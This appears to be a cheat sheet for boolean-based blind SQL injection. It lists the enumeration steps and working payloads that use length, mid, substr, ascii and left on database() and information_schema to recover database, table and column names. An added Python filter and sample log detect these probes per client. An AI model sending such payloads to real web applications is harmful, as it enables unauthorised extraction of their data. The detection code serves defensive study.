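Steps: guess the database name length -- guess the database name -- guess the number of tables -- guess the table name length -- guess the table name -- guess the number of columns -- guess the column name length -- guess the column name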
1 and length(database())>3
1 and mid(database(),1,1)='a' // substr() works too
1 and ascii(substr((select database()),1,1))='<number>' // <number> is the ASCII code being tested
1 and left(database(),4)='sqli' // compares a string prefix
1 and 1=((select count(*) from information_schema.tables where table_schema='sqli')<3)
1 and length((select table_name from information_schema.tables where table_schema='sqli' limit 0,1))=3
1 and mid((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),1,1)='s'
1 and left((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),4)='sqli'
1 and ascii(substr((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),1,1))='<number>'
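
A defender-side view of the probes above, as an added example that is not part of the original page: a Python filter that flags request parameters shaped like these boolean-blind payloads and counts them per client, since blind extraction shows up as many near-identical requests from one source. The log format, paths, client addresses and function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# A probe = boolean connective + measuring/slicing function + a look at the
# schema name or the catalog tables + a comparison (the shape of every payload above).
PROBE_RE = re.compile(
    r"\b(?:and|or)\b.*\b(?:length|mid|substr|substring|left|ascii|ord|count)\s*\("
    r".*(?:database\s*\(\s*\)|information_schema\.).*[<>=]",
    re.IGNORECASE | re.DOTALL,
)
LINE_RE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (assumed format; addresses are documentation ranges).
SAMPLE_LOG = """\
203.0.113.7 "GET /item?id=1%20and%20length(database())%3E3 HTTP/1.1" 200 512
203.0.113.7 "GET /item?id=1%20and%20ascii(substr((select%20database()),1,1))=115 HTTP/1.1" 200 498
203.0.113.7 "GET /item?id=1+and+1=((select+count(*)+from+information_schema.tables+where+table_schema='sqli')<3) HTTP/1.1" 200 512
198.51.100.4 "GET /item?id=42 HTTP/1.1" 200 512
198.51.100.4 "GET /search?q=left+and+right+length HTTP/1.1" 200 730
"""

def is_blind_probe(value: str) -> bool:
    """True if a decoded parameter value looks like a boolean-blind probe."""
    # Replace inline /* */ comments and whitespace runs with one space before matching.
    collapsed = re.sub(r"/\*.*?\*/|\s+", " ", value)
    return bool(PROBE_RE.search(collapsed))

def probes_per_client(log_text: str) -> Counter:
    """Count probe-shaped requests per client address."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl URL-decodes each value, so %20 and + both become spaces.
        values = [v for _, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)]
        if any(is_blind_probe(v) for v in values):
            hits[client] += 1
    return hits

if __name__ == "__main__":
    for client, n in probes_per_client(SAMPLE_LOG).most_common():
        print(f"{client}: {n} probe-shaped requests")
```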
